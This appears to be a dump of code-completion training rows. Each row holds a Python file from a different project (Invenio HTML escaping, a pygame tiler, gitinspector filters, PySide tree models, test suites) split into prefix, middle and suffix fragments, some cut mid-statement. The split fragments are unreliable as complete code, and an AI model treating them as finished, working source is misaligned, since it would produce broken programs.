Dataset columns (value ranges as reported by the dataset viewer):

    repo_name   stringlengths    5 .. 100
    path        stringlengths    4 .. 231
    language    stringclasses    1 value
    license     stringclasses    15 values
    size        int64            6 .. 947k
    score       float64          0 .. 0.34
    prefix      stringlengths    0 .. 8.16k
    middle      stringlengths    3 .. 512
    suffix      stringlengths    0 .. 8.17k
Dziolas/invenio
modules/miscutil/lib/htmlutils.py
Python
gpl-2.0
37,499
0.004293
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.

"""HTML utilities."""

__revision__ = "$Id$"

from HTMLParser import HTMLParser
from invenio.config import CFG_SITE_URL, \
                           CFG_MATHJAX_HOSTING, \
                           CFG_MATHJAX_RENDERS_MATHML, \
                           CFG_SITE_LANG, \
                           CFG_WEBDIR
from invenio.textutils import indent_text, encode_for_xml
import re
import cgi
import os
import sys

if sys.hexversion < 0x2060000:
    try:
        import simplejson as json
        CFG_JSON_AVAILABLE = True
    except ImportError:
        # Okay, no Ajax app will be possible, but continue anyway,
        # since this package is only recommended, not mandatory.
        CFG_JSON_AVAILABLE = False
        json = None
else:
    import json
    CFG_JSON_AVAILABLE = True

try:
    from BeautifulSoup import BeautifulSoup
    CFG_BEAUTIFULSOUP_INSTALLED = True
except ImportError:
    CFG_BEAUTIFULSOUP_INSTALLED = False

try:
    import tidy
    CFG_TIDY_INSTALLED = True
except ImportError:
    CFG_TIDY_INSTALLED = False

# List of allowed tags (tags that won't create any XSS risk)
CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST = ('a', 'p', 'br', 'blockquote', 'strong',
                                         'b', 'u', 'i', 'em', 'ul', 'ol', 'li',
                                         'sub', 'sup', 'div', 'strike')
# List of allowed attributes. Be cautious, some attributes may be risky:
# <p style="background: url(myxss_suite.js)">
CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST = ('href', 'name', 'class')

## precompile some often-used regexps for speed reasons:
RE_HTML = re.compile("(?s)<[^>]*>|&#?\w+;")
RE_HTML_WITHOUT_ESCAPED_CHARS = re.compile("(?s)<[^>]*>")

# url validation regex
regex_url = re.compile(r'^(?:http|ftp)s?://'  # http:// or https://
                       r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
                       r'localhost|'  # localhost...
                       r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
                       r'(?::\d+)?'  # optional port
                       r'(?:/?|[/?]\S+)$', re.IGNORECASE)


def nmtoken_from_string(text):
    """
    Returns a Nmtoken from a string.

    It is useful to produce XHTML-valid values for the 'name' attribute
    of an anchor.

    CAUTION: the function is not injective: 2 different texts might lead
    to the same result. This is improbable on a single page.

    Nmtoken is the type that is a mixture of characters supported in
    attributes such as 'name' in the HTML 'a' tag. For example,
    <a name="Articles%20%26%20Preprints"> should be transformed to
    <a name="Articles372037263720Preprints"> using this function.
    http://www.w3.org/TR/2000/REC-xml-20001006#NT-Nmtoken

    Also note that this function filters more characters than specified
    by the definition of Nmtoken ('CombiningChar' and 'Extender' charsets
    are filtered out).
    """
    text = text.replace('-', '--')
    return ''.join([(((not char.isalnum() and char not in ['.', '-', '_', ':'])
                      and str(ord(char))) or char)
                    for char in text])


def escape_html(text, escape_quotes=False):
    """Escape all HTML tags, avoiding XSS attacks.

    < => &lt;
    > => &gt;
    & => &amp;

    @param text: text to be escaped from HTML tags
    @param escape_quotes: if True, escape any quote mark to its HTML entity:
                          " => &quot;
                          ' => &#39;
    """
    text = text.replace('&', '&amp;')
    text = text.replace('<', '&lt;')
    text = text.replace('>', '&gt;')
    if escape_quotes:
        text = text.replace('"', '&quot;')
        text = text.replace("'", '&#39;')
    return text

CFG_JS_CHARS_MAPPINGS = {
    '\\': '\\\\',
    "'": "\\'",
    '"': '\\"',
    '\b': '\\b',
    '\f': '\\f',
    '\n': '\\n',
    '\r': '\\r',
    '\t': '\\t',
    '\v': '\\v',
}
for i in range(0x20):
    CFG_JS_CHARS_MAPPINGS.setdefault(chr(i), '\\u%04x' % (i,))
for i in (0x2028, 0x2029):
    CFG_JS_CHARS_MAPPINGS.setdefault(unichr(i), '\\u%04x' % (i,))
RE_ESCAPE_JS_CHARS = re.compile(u'''[\\x00-\\x1f\\\\"\\\\'\\b\\f\\n\\r\\t\\v\u2028\u2029]''')
RE_CLOSING_SCRIPT_TAG = re.compile('</script>', re.IGNORECASE)


def escape_javascript_string(text, escape_for_html=True,
                             escape_quote_for_html=False, escape_CDATA=True,
                             escape_script_tag_with_quote='"'):
    """
    Escape text in order to be used as a Javascript string in various
    contexts.

    Examples::

        >>> text = '''"Are you a Munchkin?" asked Dorothy.
        ... "No, but I am their friend"'''
        >>> escape_javascript_string(text)
        '\\"Are you a Munchkin?\\" asked Dorothy.\\n\\"No, but I am their friend\\"'

    The returned string can be enclosed either in single or double quote
    delimiters.

    THE FUNCTION ASSUMES THAT YOU HAVE ALREADY WASHED THE STRING OF UNSAFE
    CONTENT, according to the context you plan to use the string in. The
    function will just make sure that the string will not break your
    Javascript/HTML code/markup.

    If you plan to include the string inside the body of an HTML page, you
    will probably want to set C{escape_for_html} to True, in order to
    produce XHTML-valid pages when the input string contains characters
    such as <, > and &.

    Furthermore, if you plan to include the string as part of a tag
    attribute (for eg. <a href="#" onclick="foo&quot;bar">), you might want
    to set C{escape_quote_for_html} to True.

    If you plan to include the string inside the body of an HTML page,
    enclosed by CDATA delimiters, then you would *not* need to escape HTML
    tags. Using CDATA delimiters allows including Javascript strings meant
    to refer to HTML tags (eg. in case you would like to manipulate the DOM
    tree to add new nodes to the page), which would not be possible when
    escaping the HTML. For eg.:

        /*<![CDATA[*/
            document.getElementById('foo').innerHTML = '<p>bar</p>'
        /*]]>*/

    In this case you will probably want to set C{escape_CDATA} to True in
    order to produce an XHTML-valid document, in case a closing CDATA
    delimiter is in your input string. Parameter C{escape_CDATA} is not
    considered when C{escape_for_html} is set to True.

    Note that CDATA delimiters might be automatically added by the browser,
    based on the content-type used to serve the page.

    When C{escape_for_html} is set to False, whatever option is chosen for
    C{escape_CDATA}, the string must not contain a '</script>' tag
    (apparently...). The only option to keep this '</script>' tag (if you
    need it) is to split it, which requires knowing which quote delimiter
    you plan to use. For eg.:

    Examples::

        >>> text = '''foo</script>bar'''
        >>> val = escape_javascript_string(text, escape_for_html=False, escape_script_tag_with_quote='"')
        >>> val
        'foo</scr"+"ipt>bar'
        >>> mycode = '''alert("%s")''' % val

    C{escape_script_tag_with_quote} is not considered when
    C{escape_for_html} is set to True.

    If you are planning to return the string as part of a pure Javascript
    document, then you should in principle set both C{escape_for_html} and
    C{escape_CDATA} to False, and C{escape_script_tag_with_quote} to None.

    @param text: string to be escaped
    @param escape_for_html: if True, also escape input for HTML
    @param escape_CDATA: if True, escape closing CDATA tags (when C{escape_for_
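A minimal sketch (my own illustration, not part of the Invenio file above) of the ampersand-first ordering that escape_html's docstring relies on: replacing & before < and > prevents the generated entities from being double-escaped.

    def escape_html_sketch(text, escape_quotes=False):
        # '&' must be handled first, or '&lt;' would become '&amp;lt;'.
        text = text.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
        if escape_quotes:
            text = text.replace('"', '&quot;').replace("'", '&#39;')
        return text

    assert escape_html_sketch('<script>alert("x")</script>') == '&lt;script&gt;alert("x")&lt;/script&gt;'
    assert escape_html_sketch('"x"', escape_quotes=True) == '&quot;x&quot;'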
YannThorimbert/PyWorld2D
rendering/tilers/tilemanager.py
Python
mit
11,093
0.009015
import math, os
import pygame
import thorpy

has_surfarray = False
try:
    from PyWorld2D.rendering.tilers.beachtiler import BeachTiler
    from PyWorld2D.rendering.tilers.basetiler import BaseTiler
    from PyWorld2D.rendering.tilers.roundtiler import RoundTiler
    from PyWorld2D.rendering.tilers.loadtiler import LoadTiler
    has_surfarray = True
except:
    from PyWorld2D.rendering.tilers.loadtiler import LoadTiler

def get_mixed_tiles(img1, img2, alpha_img_2):
    i1 = img1.copy()
    i2 = img2.copy()
    i2.set_alpha(alpha_img_2)
    i1.blit(i2,(0,0))
    return i1

##def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
##    w, h = img.get_size()
##    s = pygame.Surface((2*w,2*h))
##    s.blit(img, (0,0))
##    s.blit(img, (w,0))
##    s.blit(img, (0,h))
##    s.blit(img, (w,h))
##    #now we just have to take slices
##    images = []
##    for i in range(nframes):
##        if sin:
##            delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
##            delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
##        else:
##            delta_x = i*dx
##            delta_y = i*dy
##        result = pygame.Surface((w,h))
##        result.blit(s,(delta_x-w//2,delta_y-h//2))
##        images.append(result)
##    if reverse:
##        images += images[::-1][1:-1]
##    return images

def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
    r = img.get_rect()
    w,h = r.size
    images = []
    for i in range(nframes):
        if sin:
            delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
            delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
        else:
            delta_x = i*dx
            delta_y = i*dy
##        print(delta_x,w)
##        assert abs(delta_x) <= w
##        assert abs(delta_y) <= h
        result = pygame.Surface(r.size)
        xsgn, ysgn = 1, 1
        if delta_x>0: xsgn = -1
        if delta_y>0: ysgn = -1
        result.blit(img,r.move(delta_x,delta_y))
        result.blit(img,r.move(delta_x,delta_y+ysgn*h))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h))
        images.append(result)
    if reverse:
        images += images[::-1][1:-1]
    return images

def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0,
                reverse=False, sin=True, colorkey=None):
    """Returns a list of lists of images of the form: imgs[size][frame]"""
    imgs = []
    for size in sizes:
        #smoothscale is important here, otherwise FAST should be always True
        img = pygame.transform.smoothscale(img_fullsize, (size,)*2)
        dx = 0
        if dx_divider:
            dx = int(size/dx_divider)
        dy = 0
        if dy_divider:
            dy = int(size/dy_divider)
        imgs.append(get_shifted_tiles(img, nframes, dx, dy, reverse, sin))
    if colorkey:
        for tiles in imgs:
            for img in tiles:
                img.set_colorkey(colorkey)
    return imgs

def build_color_tiles(color, sizes, nframes, reverse=False, sin=True):
    imgs = []
    for size in sizes:
        img = pygame.Surface((size,)*2)
        img.fill(color)
        imgs.append(get_shifted_tiles(img, nframes, 0, 0, reverse, sin))
    return imgs

def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True):
    values = []
    if sin:
        current = initial_value
    else:
        current = 0
    for i in range(nframes):
        if sin:
            delta = increment*math.sin(2.*math.pi*i/float(nframes))
        else:
            delta = increment
        current += delta
        values.append(int(current))
    if reverse:
        values = values[::-1][1:-1]
    return values

def build_tilers(grasses, waters, radius_divider, use_beach_tiler):
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        for n in range(nframes):
            if use_beach_tiler:
                tiler = BeachTiler(grasses[z][n], waters[z][n])
                tiler.make(size=(cell_size,)*2, radius=radius)
            else:
                tiler = BaseTiler(grasses[z][n])
                tiler.make(size=(cell_size,)*2, radius=0)
            tilers[z][n] = tiler
    return tilers

def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler):
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        if use_beach_tiler:
            tiler = BeachTiler(grasses[z][0], waters[z][0])
            tiler.make(size=(cell_size,)*2, radius=radius)
        else:
            tiler = BaseTiler(grasses[z][0])
            tiler.make(size=(cell_size,)*2, radius=0)
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers

def build_tilers_fast(grasses, waters, radius_divider, use_beach_tiler):
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    cell_size = grasses[0][0].get_width()
    radius = cell_size//radius_divider
    for n in range(nframes):
        if use_beach_tiler:
            tiler = BeachTiler(grasses[0][n], waters[0][n])
            tiler.make(size=(cell_size,)*2, radius=radius)
        else:
            tiler = BaseTiler(grasses[0][n])
            tiler.make(size=(cell_size,)*2, radius=0)
        tilers[0][n] = tiler
    if nzoom > 1:
        for z in range(1,nzoom):
            for n in range(nframes):
                if use_beach_tiler:
                    tiler = BeachTiler(grasses[z][n], waters[z][n])
                else:
                    tiler = BaseTiler(grasses[z][n])
                size = grasses[z][n].get_size()
                ref = tilers[0][n]
                for key in ref.imgs:
                    tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size)
                tilers[z][n] = tiler
    return tilers

def load_tilers_dynamic(i, grasses, waters, folder): # for static tilers, nframes=1
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        # could be heavily optimized: each image could be loaded once instead of z times
        cell_size = grasses[z][0].get_width()
        for n in range(nframes):
            basename = os.path.join(folder,str(i)+"_"+str(n)+"_")
            tilers[z][n] = LoadTiler(basename, (cell_size,)*2)
    return tilers

def load_tilers_static(i, grasses, waters, folder): # for static tilers, nframes=1
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        # could be heavily optimized: each image could be loaded once instead of z times
        cell_size = grasses[z][0].get_width()
        basename = os.path.join(folder,str(i)+"_"+str(0)+"_")
        tiler = LoadTiler(basename, (cell_size,)*2)
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers

def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
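A small illustration (mine, not from PyWorld2D) of the sinusoidal offset schedule get_shifted_tiles uses: frame i of nframes gets an offset dx*sin(2*pi*i/nframes), so the last frame wraps back to the first and the animation loops seamlessly.

    import math

    def shift_offsets(nframes, dx):
        # One offset per frame; frame 0 and frame nframes map to the same value.
        return [dx * math.sin(2.0 * math.pi * i / nframes) for i in range(nframes)]

    print([round(v, 2) for v in shift_offsets(8, 4)])
    # [0.0, 2.83, 4.0, 2.83, 0.0, -2.83, -4.0, -2.83]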
vpol/gitinspector
gitinspector/filtering.py
Python
gpl-3.0
5,218
0.003642
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see <http://www.gnu.org/licenses/>.

from __future__ import print_function
from __future__ import unicode_literals

import re
import textwrap

from gitinspector.localization import N_
from gitinspector.outputable import Outputable
from gitinspector import terminal

__filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]}


class InvalidRegExpError(ValueError):
    def __init__(self, msg):
        super(InvalidRegExpError, self).__init__(msg)
        self.msg = msg


def get():
    return __filters__


def __add_one__(string):
    for i in __filters__:
        if (i + ":").lower() == string[0:len(i) + 1].lower():
            __filters__[i][0].append(string[len(i) + 1:])
            return
    __filters__["file"][0].append(string)


def add(string):
    rules = string.split(",")
    for rule in rules:
        __add_one__(rule)


def clear():
    for i in __filters__:
        __filters__[i][0] = []


def get_filered(filter_type="file"):
    return __filters__[filter_type][1]


def has_filtered():
    for i in __filters__:
        if __filters__[i][1]:
            return True
    return False


def set_filtered(string, filter_type="file"):
    string = string.strip()
    if len(string) > 0:
        for i in __filters__[filter_type][0]:
            try:
                if re.search(i, string) != None:
                    __filters__[filter_type][1].add(string)
                    return True
            except:
                raise InvalidRegExpError(_("invalid regular expression specified"))
    return False


FILTERING_INFO_TEXT = N_(
    "The following files were excluded from the statistics due to the specified exclusion patterns")
FILTERING_AUTHOR_INFO_TEXT = N_(
    "The following authors were excluded from the statistics due to the specified exclusion patterns")
FILTERING_EMAIL_INFO_TEXT = N_(
    "The authors with the following emails were excluded from the statistics due to the specified exclusion patterns")


class Filtering(Outputable):
    @staticmethod
    def __output_html_section__(info_string, filtered):
        filtering_xml = ""
        if filtered:
            filtering_xml += "<p>" + info_string + "." + "</p>"
            for i in filtered:
                filtering_xml += "<p>" + i + "</p>"
        return filtering_xml

    def output_html(self):
        if has_filtered():
            filtering_xml = "<div><div class=\"box\">"
            Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
            Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
            Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
            filtering_xml += "</div></div>"
            print(filtering_xml)

    @staticmethod
    def __output_text_section__(info_string, filtered):
        if filtered:
            print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0]))
            for i in filtered:
                (width, _unused) = terminal.get_size()
                print("...%s" % i[-width + 3:] if len(i) > width else i)

    def output_text(self):
        Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
        Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
        Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])

    @staticmethod
    def __output_xml_section__(info_string, filtered, container_tagname):
        if filtered:
            message_xml = "\t\t\t<message>" + info_string + "</message>\n"
            filtering_xml = ""
            for i in filtered:
                filtering_xml += "\t\t\t\t<entry>".format(container_tagname) + i + "</entry>\n".format(
                    container_tagname)
            print("\t\t<{0}>".format(container_tagname))
            print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n")
            print("\t\t</{0}>".format(container_tagname))

    def output_xml(self):
        if has_filtered():
            print("\t<filtering>")
            Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files")
            Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors")
            Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails")
            print("\t</filtering>")
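A hypothetical usage sketch of the filter module above, assuming it is importable as gitinspector.filtering: a "type:" prefix routes a rule to that filter list, and an unprefixed rule defaults to "file".

    from gitinspector import filtering

    filtering.add("author:John,\\.py$")   # "author:John" -> author rules, "\.py$" -> file rules
    filtering.set_filtered("setup.py")    # matches \.py$, so it is recorded as filtered
    print(filtering.get())                # roughly: {"file": [["\\.py$"], {"setup.py"}], ...}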
freedomofkeima/messenger-maid-chan
tests/test_translate.py
Python
mit
1,946
0
# -*- coding: utf-8 -*- import os from mock import Mock, patch from maidchan.translate import get_trans_language_prediction, get_translation SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__)) def _get_response(name): path = os.path.join(SCRIPT_PATH, 'data', name) with open(path) as f: return f.read().encode("utf-8") def mocked_trans(*args, **kwargs): """ Mocked "trans" """ process_mock = Mock() return_value = None if '-id' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_prediction.txt')
elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_translation.txt') elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_translation_2.txt') attrs = {'communicate.return_value': (return_value, None)} process
_mock.configure_mock(**attrs) return process_mock class TestTranslate: @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translate_language_prediction(self, mock_trans): assert get_trans_language_prediction("hello, world!") == "en" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_en_to_ja(self, mock_trans): query = "translate hello, world! from english to japanese" assert get_translation(query) == "こんにちは世界!" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_en_to_default(self, mock_trans): query = "translate hello, world! from english" assert get_translation(query) == "こんにちは世界!" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_default_to_id(self, mock_trans): query = "translate hello, world! to bahasa" assert get_translation(query) == "Halo Dunia!"
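The Popen-mocking pattern above generalizes; here is a minimal self-contained sketch (hypothetical names, standard-library mock) of faking a subprocess's communicate() call:

    from unittest.mock import Mock, patch
    import subprocess

    def fake_popen(*args, **kwargs):
        proc = Mock()
        # communicate() returns an (stdout, stderr) tuple, like a real Popen
        proc.configure_mock(**{'communicate.return_value': (b'mocked output', None)})
        return proc

    with patch('subprocess.Popen', side_effect=fake_popen):
        out, err = subprocess.Popen(['any', 'command']).communicate()
        assert out == b'mocked output'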
Snegovikufa/HPGL-GUI
gui_widgets/treemodel.py
Python
gpl-2.0
12,137
0.004696
#from PySide import QtGui, QtCore
#from cube_list import CubeItem, RootItem
#
#class TreeModel(QtGui.QStandardItemModel):
#    def __init__(self, rows, columns, contCubes, indCubes, parent = None):
#        super(TreeModel, self).__init__(rows, columns, parent)
#        self.contCubes = contCubes
#        self.indCubes = indCubes
#
##        self.rootItem = CubeItem()
#
#    def flags(self, index):
#        if index.parent() == QtCore.QModelIndex():
#            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
#        if index.column() == 1 or index.column() == 2:
#            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
#        return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
#
#    def setData(self, index, value, role=QtCore.Qt.EditRole):
#        if role != QtCore.Qt.EditRole:
#            return False
#        variant = value
#        if index.column() == 0:
#            value = str(value.toString())
#
#            if index.row() == 0:
#                self.contCubes.setName(value, index.row())
#            if index.row() == 1: #index.parent.row()==1
#                self.indCubes.setName(value, index.row())
#
#            result = True
#
#        if index.column() == 3:
#            value = int(value)
#
#            if index.row() == 0:
#                self.contCubes.changeUndefValue(value, index.row())
#            if index.row() == 1:
#                self.indCubes.changeUndefValue(value, index.row())
#
#            result = True
#
#        if result:
#            self.dataChanged.emit(index, index)
#        return result

from PySide import QtCore, QtGui


class TreeItem(object):
    def __init__(self, data, parent=None):
        self.parentItem = parent
        self.itemData = data
        self.childItems = []

    def child(self, row):
        return self.childItems[row]

    def childCount(self):
        return len(self.childItems)

    def childNumber(self):
        if self.parentItem != None:
            return self.parentItem.childItems.index(self)
        return 0

    def columnCount(self):
        return len(self.itemData)

    def data(self, column):
        return self.itemData[column]

    def insertChildren(self, position, count, columns):
        if position < 0 or position > len(self.childItems):
            return False
        for row in range(count):
            data = [None for v in range(columns)]
            item = TreeItem(data, self)
            self.childItems.insert(position, item)
        return True

    def insertColumns(self, position, columns):
        if position < 0 or position > len(self.itemData):
            return False
        for column in range(columns):
            self.itemData.insert(position, None)
        for child in self.childItems:
            child.insertColumns(position, columns)
        return True

    def parent(self):
        return self.parentItem

    def removeChildren(self, position, count):
        if position < 0 or position + count > len(self.childItems):
            return False
        for row in range(count):
            self.childItems.pop(position)
        return True

    def removeColumns(self, position, columns):
        if position < 0 or position + columns > len(self.itemData):
            return False
        for column in range(columns):
            self.itemData.pop(position)
        for child in self.childItems:
            child.removeColumns(position, columns)
        return True

    def setData(self, column, value):
        if column < 0 or column >= len(self.itemData):
            return False
        self.itemData[column] = value
        return True


class TreeModel(QtCore.QAbstractItemModel):
    def __init__(self, headers, contCubes, indCubes, parent=None):
        super(TreeModel, self).__init__(parent)
        self.contCubes = contCubes
        self.indCubes = indCubes
        rootData = [header for header in headers]
        self.rootItem = TreeItem(rootData)
#        self.setupModelData(data.split("\n"), self.rootItem)

    def columnCount(self, parent=QtCore.QModelIndex()):
        return self.rootItem.columnCount()

    def data(self, index, role):
        if not index.isValid():
            return None
        if role == QtCore.Qt.DecorationRole:
            if self.getItem(index).parent() == self.rootItem:
                if index.column() == 0:
                    if index.row() == 0:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/cont.png')
                        pixmap = pixmap.scaled(22, 22,
                                               aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                               transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap
                    if index.row() == 1:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/ind.png')
                        pixmap = pixmap.scaled(22, 22,
                                               aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                               transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap
        if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:
            item = self.getItem(index)
            return item.data(index.column())
        return None

    def flags(self, index):
        parentItem = self.getItem(index).parent()
        if parentItem == self.rootItem:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
        if index.column() == 1 or index.column() == 2:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
        return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable

    def getItem(self, index):
        if index.isValid():
            item = index.internalPointer()
            if item:
                return item
        return self.rootItem

    def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return self.rootItem.data(section)
        return None

    def index(self, row, column, parent=QtCore.QModelIndex()):
        if parent.isValid() and parent.column() != 0:
            return QtCore.QModelIndex()
        parentItem = self.getItem(parent)
        childItem = parentItem.child(row)
        if childItem:
            return self.createIndex(row, column, childItem)
        else:
            return QtCore.QModelIndex()

    def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginInsertColumns(parent, position, position + columns - 1)
        success = self.rootItem.insertColumns(position, columns)
        self.endInsertColumns()
        return success

    def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        self.beginInsertRows(parent, position, position + rows - 1)
        success = parentItem.insertChildren(position, rows, self.rootItem.columnCount())
        self.endInsertRows()
        return success

    def parent(self, index):
        if not index.isValid():
            return QtCore.QModelIndex()
        childItem = self.getItem(index)
        parentItem = childItem.parent()
        if parentItem == self.rootItem:
            return QtCore.QModelIndex()
        return self.createIndex(parentItem.childNumber(), 0, parentItem)

    def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginRemoveColumns(parent, position, position + columns - 1)
        success = self.rootItem.removeColumns(position, columns)
        self.endRemoveColumns()
        if self.rootItem.colu
rambo/python-holviapi
holviapi/tests/test_refnos.py
Python
mit
2,888
0
# -*- coding: utf-8 -*-
import random

import pytest
from holviapi.utils import (
    ISO_REFERENCE_VALID,
    fin_reference_isvalid,
    int2fin_reference,
    iso_reference_isvalid,
    str2iso_reference
)


def test_fin_reference_isvalid_valid_results():
    """Test handpicked, known-good inputs"""
    assert fin_reference_isvalid(13)
    assert fin_reference_isvalid(107)
    assert fin_reference_isvalid(105523)
    assert fin_reference_isvalid(102319)
    assert fin_reference_isvalid(108326)
    assert fin_reference_isvalid(100816)
    assert fin_reference_isvalid(108724)
    assert fin_reference_isvalid(108711)


def test_fin_reference_isvalid_invalid_results():
    """Test handpicked, known-bad inputs"""
    assert not fin_reference_isvalid(1071110)
    assert not fin_reference_isvalid(1055110)
    assert not fin_reference_isvalid(1026110)
    assert not fin_reference_isvalid(1039110)
    assert not fin_reference_isvalid(1084110)


def test_int2fin_reference_valid_results():
    """Test handpicked, known-good inputs and corresponding outputs"""
    assert int2fin_reference(1) == '13'
    assert int2fin_reference(10) == '107'
    assert int2fin_reference(10552) == '105523'
    assert int2fin_reference(10231) == '102319'
    assert int2fin_reference(10832) == '108326'
    assert int2fin_reference(10081) == '100816'
    assert int2fin_reference(10872) == '108724'
    assert int2fin_reference(10871) == '108711'


def test_int2fin_reference_invalid_results():
    """Test some invalid values from issue #6"""
    assert int2fin_reference(10711) != '1071110'
    assert int2fin_reference(10551) != '1055110'
    assert int2fin_reference(10261) != '1026110'
    assert int2fin_reference(10391) != '1039110'
    assert int2fin_reference(10841) != '1084110'


def test_int2fin_reference_random_inputs():
    for x in range(1000):
        testint = random.randint(1, 2**24)
        reference = int2fin_reference(testint)
        assert fin_reference_isvalid(reference)


def test_str2iso_reference_valid_results():
    assert str2iso_reference('C2H5OH') == 'RF97C2H5OH'


def test_str2iso_reference_invalid_results():
    assert str2iso_reference('C2H5OH') != 'RF40C2H5OH'


def test_iso_reference_isvalid_valid_results():
    assert iso_reference_isvalid('RF97C2H5OH')


